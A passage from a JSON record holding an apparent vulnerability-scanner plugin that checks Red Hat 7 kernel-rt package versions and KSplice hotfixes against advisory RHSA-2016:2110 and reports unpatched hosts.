preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\", \"CVE-2016-7039\", \"CVE-2016-8666\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:2110\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2110\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-kvm-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-kvm-debuginfo-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n 
if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-rt-doc-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-kvm-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-kvm-debuginfo-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-kvm-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-kvm-debuginfo-3.10.0-327.36.3.rt56.238.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}